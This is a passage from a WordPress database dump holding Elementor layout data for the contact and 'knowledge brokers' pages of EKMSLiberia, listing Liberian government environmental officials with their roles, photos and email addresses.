\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>Division of Knowledge Management &amp; Archive<br \\/>MOCI<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"27df91b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a7132bc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/02\\/nafaa.png\",\"id\":3520}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\n<\\/br>\\nManager\\n<\\/br>\\nDepartment of Marine Fisheries and Environment\\n<\\/br>\\nNaFAA\\n<\\/br>\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a594c07\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"861733c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4f48179\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<br \\/><a href=\\\"&quot;mailto:stephenlavalah@yahoo.com\\\">stephenlavalah@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d029a1b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6cd1f2c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0080713\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3fc1d16\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/sherman.png\",\"id\":3644}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"758c067\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/borbor.png\",\"id\":3646}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a5788b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"369beaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Albert M. Sherman <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:itssherman@gmail.com\\\">itssherman@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e5b0622\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Amos Borbor <\\/strong><br \\/>Finance &amp; Administrative Officer<br \\/>MOT<br \\/><a href=\\\"mailto:felixborbor@gmail.com\\\">felixborbor@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"58a8bc8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/simpson.png\",\"id\":3651}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c7ec2c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry A. Simpson <\\/strong><br \\/>Weather Forecaster<br \\/>MOT<br \\/><a href=\\\"mailto:ransford2024@gmail.com\\\">ransford2024@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c5ecaba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>James Kollie <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:jameskollie@yahoo.com\\\">jameskollie@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"308cd55\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Eric Pervist <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:gendermedia1@gmail.com\\\">gendermedia1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bcdddb1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"98f890d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c45b21c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"1205269\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"ace9d4f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"765a1b9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6893e76\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"237d9e7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d02417\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>N. Mamatu G. King <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:kingmamatu@gmail.com\\\">kingmamatu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9d523fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d8aba5e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J. Josiah N. Domah <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:josiahdomah@@gmail.com\\\">josiahdomah@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"be454e0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b64ac2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Emmanuel Ballah <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:ballah_@yahoo.com\\\">ballah_@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(24711,3658,'_elementor_edit_mode','builder'),(24712,3658,'_elementor_template_type','wp-page'),(24713,3658,'_elementor_version','3.0.16'),(24714,3658,'_wp_page_template','default'),(24715,3658,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a 